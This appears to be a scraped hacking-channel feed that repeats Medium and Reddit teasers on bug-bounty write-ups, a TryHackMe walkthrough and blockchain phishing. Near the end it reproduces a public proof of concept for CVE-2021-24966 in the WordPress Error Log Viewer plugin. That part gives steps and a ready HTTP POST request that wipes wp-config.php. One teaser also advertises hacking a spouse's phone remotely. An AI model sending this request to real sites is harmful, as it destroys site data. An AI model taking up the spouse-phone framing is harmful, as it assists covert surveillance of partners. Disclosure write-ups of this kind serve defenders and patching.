No Rate Limiting Vulnerability & Bypasses - Cyber Sapiens Internship Task-17
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…Continue reading on Medium »
Read more...
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…Continue reading on Medium »
Read more...
Insecure Direct Object Reference- Cyber Sapiens Internship Task-18
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…Continue reading on Medium »
Read more...
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…Continue reading on Medium »
Read more...
File Inclusion Vulnerabilities - Cyber Sapiens Internship Task-19
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…Continue reading on Medium »
Read more...
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…Continue reading on Medium »
Read more...
Hacking on Medium
Un solo hacker “voltea” toda la red de Corea del Norte
https://cdn-images-1.medium.com/max/1195/0*uczZWrmb9cUPucvI
PUBLICADO EN 15 FEBRERO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Un solo hacker “voltea” toda la red de Corea del Norte
https://cdn-images-1.medium.com/max/1195/0*uczZWrmb9cUPucvI
PUBLICADO EN 15 FEBRERO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Un solo hacker “voltea” toda la red de Corea del Norte
PUBLICADO EN 15 FEBRERO, 2022POR EHACKING
Hacking on Medium
Content Discovery
https://cdn-images-1.medium.com/max/600/0*9vnOMlqFWzMBmAFG.png
Today, I will tell you about Content Discovery. Why you need it, some different methods, why you should know about it and show you some…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Content Discovery
https://cdn-images-1.medium.com/max/600/0*9vnOMlqFWzMBmAFG.png
Today, I will tell you about Content Discovery. Why you need it, some different methods, why you should know about it and show you some…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Content Discovery
Today, I will tell you about Content Discovery. Why you need it, some different methods, why you should know about it and show you some…
Hacking on Medium
TryHackMe — Pickle Rick challenge walkthrough
https://cdn-images-1.medium.com/max/2600/1*C2w7LKxX6DL--cEnAziOeQ.jpeg
Today I’m going to be showcasing a neat and fun challenge set up by TryHackMe, called Pickle Rick. The challenge can be found here.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe — Pickle Rick challenge walkthrough
https://cdn-images-1.medium.com/max/2600/1*C2w7LKxX6DL--cEnAziOeQ.jpeg
Today I’m going to be showcasing a neat and fun challenge set up by TryHackMe, called Pickle Rick. The challenge can be found here.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe — Pickle Rick challenge walkthrough
Today I’m going to be showcasing a neat and fun challenge set up by TryHackMe, called Pickle Rick. The challenge can be found here.
Hacking on Medium
How to remotely hack into the phone of a cheating spouse
https://cdn-images-1.medium.com/max/2600/1*e01jZrM62bceMcpZfE1mPQ.jpeg
How to remotely hack into the phone of a cheating spouse
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How to remotely hack into the phone of a cheating spouse
https://cdn-images-1.medium.com/max/2600/1*e01jZrM62bceMcpZfE1mPQ.jpeg
How to remotely hack into the phone of a cheating spouse
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to remotely hack into the phone of a cheating spouse
How to remotely hack into the phone of a cheating spouse
Directory Listing Vulnerability - Cyber Sapiens Internship Task-16
https://sapt.medium.com/directory-listing-vulnerability-cyber-sapiens-internship-task-16-fca5c9a4bb8a?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://sapt.medium.com/directory-listing-vulnerability-cyber-sapiens-internship-task-16-fca5c9a4bb8a?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Directory Listing Vulnerability - Cyber Sapiens Internship Task-16
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…Continue reading on Medium » (https://sapt.medium.com/directory-listing-vulnerability-cyber-sapiens-internship-task-16-fca5c9a4bb8a?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Directory Listing Vulnerability - Cyber Sapiens Internship Task-16
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…
No Rate Limiting Vulnerability & Bypasses - Cyber Sapiens Internship Task-17
https://sapt.medium.com/no-rate-limiting-vulnerability-bypasses-cyber-sapiens-internship-task-17-bcf31d5d511c?source=rss------bug_bounty-5
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…Continue reading on Medium » (https://sapt.medium.com/no-rate-limiting-vulnerability-bypasses-cyber-sapiens-internship-task-17-bcf31d5d511c?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://sapt.medium.com/no-rate-limiting-vulnerability-bypasses-cyber-sapiens-internship-task-17-bcf31d5d511c?source=rss------bug_bounty-5
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…Continue reading on Medium » (https://sapt.medium.com/no-rate-limiting-vulnerability-bypasses-cyber-sapiens-internship-task-17-bcf31d5d511c?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
No Rate Limiting Vulnerability & Bypasses - Cyber Sapiens Internship Task-17
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…
Insecure Direct Object Reference- Cyber Sapiens Internship Task-18
https://sapt.medium.com/insecure-direct-object-reference-cyber-sapiens-internship-task-18-986a5824c797?source=rss------bug_bounty-5
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…Continue reading on Medium » (https://sapt.medium.com/insecure-direct-object-reference-cyber-sapiens-internship-task-18-986a5824c797?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://sapt.medium.com/insecure-direct-object-reference-cyber-sapiens-internship-task-18-986a5824c797?source=rss------bug_bounty-5
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…Continue reading on Medium » (https://sapt.medium.com/insecure-direct-object-reference-cyber-sapiens-internship-task-18-986a5824c797?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
Insecure Direct Object Reference- Cyber Sapiens Internship Task-18
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…
File Inclusion Vulnerabilities - Cyber Sapiens Internship Task-19
https://sapt.medium.com/file-inclusion-vulnerabilities-cyber-sapiens-internship-task-19-d6e4b502cf83?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://sapt.medium.com/file-inclusion-vulnerabilities-cyber-sapiens-internship-task-19-d6e4b502cf83?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
File Inclusion Vulnerabilities - Cyber Sapiens Internship Task-19
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…Continue reading on Medium » (https://sapt.medium.com/file-inclusion-vulnerabilities-cyber-sapiens-internship-task-19-d6e4b502cf83?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
File Inclusion Vulnerabilities - Cyber Sapiens Internship Task-19
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly…
‘Ice phishing’ on the blockchain
https://www.reddit.com/r/redteamsec/comments/su1dcs/ice_phishing_on_the_blockchain/
submitted by /u/SCI_Rusher (https://www.reddit.com/user/SCI_Rusher)
[link] (https://aka.ms/IcePhishingOnTheBlockchain) [comments] (https://www.reddit.com/r/redteamsec/comments/su1dcs/ice_phishing_on_the_blockchain/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/su1dcs/ice_phishing_on_the_blockchain/
submitted by /u/SCI_Rusher (https://www.reddit.com/user/SCI_Rusher)
[link] (https://aka.ms/IcePhishingOnTheBlockchain) [comments] (https://www.reddit.com/r/redteamsec/comments/su1dcs/ice_phishing_on_the_blockchain/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
‘Ice phishing’ on the blockchain
Posted in r/redteamsec by u/SCI_Rusher • 1 point and 1 comment
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Error Log Viewer 1.1.1 Arbitrary File Deletion
https://4.bp.blogspot.com/-ILIpsq3JVDo/WWlvQ8IjxbI/AAAAAAAAINI/veR2GTC9zzcP6cUZEvOZqGdUDt2RtL0uQCLcBGAs/s1600/h32.png
WordPress Error Log Viewer plugin version 1.1.1 suffers from an arbitrary file deletion vulnerability where it can be leveraged to wipe the internal contents of any named file the webserver has permissions to modify.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress Error Log Viewer 1.1.1 Arbitrary File Deletion
https://4.bp.blogspot.com/-ILIpsq3JVDo/WWlvQ8IjxbI/AAAAAAAAINI/veR2GTC9zzcP6cUZEvOZqGdUDt2RtL0uQCLcBGAs/s1600/h32.png
WordPress Error Log Viewer plugin version 1.1.1 suffers from an arbitrary file deletion vulnerability where it can be leveraged to wipe the internal contents of any named file the webserver has permissions to modify.
MD5 |
bd2b398b1fa771ffccb743e2b4156dd3Download
# Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
# Date: 09-11-2021
# Exploit Author: Ceylan Bozogullarindan
# Exploit Website: https://bozogullarindan.com
# Vendor Homepage: https://bestwebsoft.com/
# Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/
# Version: 1.1.1
# Tested on: Linux
# CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)
# Description:
Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!
I've especially emphasized "clearing a log file" statement because the feature of "clearing a log file" can be used to delete an arbitrary file in a Wordpress web site. The reason of the vulnerability is that, the value of a file path which is going to be deleted is not properly and sufficiently controlled. Name of the parameter leading to the vulnerability is "rrrlgvwr_clear_file_name". It can be manipulated only authenticated users.
An attacker can use this vulnerability; to destroy the web site by deleting wp-config.php file, or to cover the fingerprints by clearing related log files.
# Steps To Reproduce
1. Install and activate the plugin.
2. Click the "Log Monitor" available under Error Log Viewer menu item.
3. Choose a log file to clear.
4. Intercept the request via Burp or any other local proxy tool.
5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php.
6. Check the content of the cleared file. You will see that the file is empty.
# PoC - Supported Materials
---------------------------------------------------------------------------
POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1
Host: 127.0.0.1:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 603
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: [admin+]
rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php
---------------------------------------------------------------------------
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress Error Log Viewer 1.1.1 Arbitrary File Deletion
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.